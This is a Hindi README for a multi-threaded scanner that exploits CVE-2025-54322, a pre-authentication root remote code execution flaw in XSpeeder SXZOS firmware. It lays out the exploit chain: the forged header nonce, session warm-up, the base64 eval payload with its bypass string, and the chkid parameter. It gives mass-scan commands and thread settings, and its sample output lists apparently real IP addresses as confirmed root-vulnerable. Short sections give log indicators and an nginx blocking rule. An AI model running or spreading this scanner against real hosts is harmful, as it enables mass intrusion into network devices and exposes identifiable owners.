
CVE-2025-54322 - XSpeeder SXZOS प्री-ऑथ RCE 0day फाइंडर क्विक
CVE-2025-54322 के लिए एक मल्टी-थ्रेडेड कमजोरी स्कैनर, जो XSpeeder SXZOS फर्मवेयर में एक अप्रमाणित रिमोट कोड निष्पादन कमजोरी है, जो वैश्विक स्तर पर ~70,000+ होस्ट्स को प्रभावित करती है।
CVE-2025-54322 XSpeeder SXZOS फर्मवेयर में खोजी गई एक गंभीर प्री-प्रमाणीकरण रिमोट कोड निष्पादन कमजोरी है, जो SD-WAN उपकरणों, राउटरों और एज नेटवर्किंग उपकरणों को संचालित करता है।
कमजोरी SXZOS फर्मवेयर के Django-आधारित वेब इंटरफ़ेस में मौजूद है:
/?title=ABC&oIp=XXX&chkid=[base64_payload]eval() फ़ंक्शन का base64-डिकोडेड उपयोगकर्ता इनपुट पर असुरक्षित उपयोग1. Calculate time-based nonce for X-SXZ-R header
2. Warm up session via /webInfos/ endpoint
3. Craft malicious payload with bypass string (#sUserCodexsPwd)
4. Base64 encode payload
5. Send exploit with exactly 3 query parameters
6. Server decodes and evaluates payload
7. Commands execute with root privileges
यह शोषण कई सुरक्षा परतों को बायपास करता है:
SXZ/2.3 के साथ जालीX-SXZ-R: [0-6]/webInfos/ के माध्यम से वार्म किया गया#sUserCodexsPwd टिप्पणी के साथ बायपासvuln-confirm.txt में परिणाम सहेजता है# रिपॉजिटरी क्लोन करें
git clone https://github.com/Sachinart/CVE-2025-54322.git
cd CVE-2025-54322
# आवश्यक निर्भरताएँ स्थापित करें
pip install -r requirements.txt
requirements.txt फ़ाइल बनाएँ:
requests>=2.31.0
urllib3>=2.0.0
python3 scanner.py targets.txt
# कस्टम थ्रेड काउंट के साथ स्कैन करें (डिफ़ॉल्ट: 10)
python3 scanner.py targets.txt 20
# तेज़ परिणामों के लिए अधिकतम थ्रेड के साथ स्कैन करें
python3 scanner.py targets.txt 50
# रूढ़िवादी थ्रेड काउंट के साथ स्कैन करें
python3 scanner.py targets.txt 5
एक targets.txt फ़ाइल बनाएँ जिसमें प्रति पंक्ति एक लक्ष्य हो:
https://192.168.1.100:4433
https://10.0.0.50:8443
https://example.com:4433
http://vulnerable-device.local
$ python3 scanner.py targets.txt 20
╔═══════════════════════════════════════════════════════════════╗
║ XSpeeder SXZOS (CVE-2025-54322) RCE Scanner ║
║ Pre-Auth Root RCE Vulnerability Checker ║
║ Showing: VULNERABLE HOSTS ONLY ║
╚═══════════════════════════════════════════════════════════════╝
[*] Loaded 2338 targets from targets.txt
[*] Using 20 concurrent threads
[*] Vulnerable hosts will be saved to: vuln-confirm.txt
[*] Starting scan...
======================================================================
[+] VULNERABLE: https://27.40.80.93:4433
[+] Status: VULNERABLE - RCE Confirmed
[+] HTTP Status: 500
[+] Output: uid=0(root) gid=0(root)
======================================================================
[*] Progress: 50/2338 | Found: 12 vulnerable
[*] Progress: 100/2338 | Found: 24 vulnerable
======================================================================
[*] SCAN COMPLETE
======================================================================
[*] Total Time: 890.45 seconds
[*] Total Targets Scanned: 2338
[*] Vulnerable Hosts Found: 156
[*] Success Rate: 6.67%
======================================================================
स्कैनर प्रदर्शित करता है:
vuln-confirm.txt)XSpeeder SXZOS CVE-2025-54322 - Vulnerable Hosts
Scan started: 2025-12-27 15:30:45
======================================================================
https://27.40.80.93:4433
Status: VULNERABLE - RCE Confirmed
Output: uid=0(root) gid=0(root)
----------------------------------------------------------------------
https://27.40.83.189:4433
Status: VULNERABLE - RCE Confirmed
Output: uid=0(root) gid=0(root)
----------------------------------------------------------------------
======================================================================
Scan completed: 2025-12-27 15:45:30
Total scanned: 2338
Vulnerable: 156
Time taken: 890.45 seconds
यह उपकरण केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है।
यदि आप कमजोर सिस्टम खोजते हैं:
यदि आप XSpeeder SXZOS उपकरणों का प्रबंधन करते हैं:
लॉग में इन संकेतकों की तलाश करें:
/?title=*&oIp=*&chkid=* के अनुरोधSXZ/2.3X-SXZ-R हेडर#sUserCodexsPwd युक्त base64 स्ट्रिंग्स/webInfos/ के बाद रूट पथ के कई अनुरोध# Nginx नियम शोषण प्रयासों को ब्लॉक करने के लिए
location / {
if ($args ~* "chkid=") {
return 403;
}
}
यह कमजोरी pwn.ai द्वारा स्वायत्त रूप से खोजी गई थी - एक AI-संचालित सुरक्षा अनुसंधान प्लेटफ़ॉर्म।
महत्वपूर्ण नोट: यह पहली सार्वजनिक रूप से दस्तावेज़ित एजेंट-पाई गई, दूर से शोषण योग्य शून्य-दिवस RCE कमजोरी है।
Chirag Artani
यह स्कैनर कार्यान्वयन सुरक्षा पेशेवरों की सहायता के लिए बनाया गया था:
यह प्रोजेक्ट MIT लाइसेंस के तहत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।
योगदान का स्वागत है! कृपया बेझिझक पुल रिक्वेस्ट सबमिट करें।
प्रश्नों, मुद्दों या सुझावों के लिए:
याद रखें: बड़ी शक्ति के साथ बड़ी जिम्मेदारी आती है। इस उपकरण का नैतिक और कानूनी रूप से उपयोग करें।
सुरक्षित रहें। नैतिक रहें। कानूनी रहें।
| लक्ष्य संख्या | अनुशंसित थ्रेड | अपेक्षित समय |
|---|
| 1-10 | 5 threads | ~1-2 मिनट |
| 10-50 | 10 threads | ~3-5 मिनट |
| 50-100 | 20 threads | ~5-10 मिनट |
| 100-500 | 30 threads | ~10-20 मिनट |
| 500+ | 40-50 threads | ~20+ मिनट |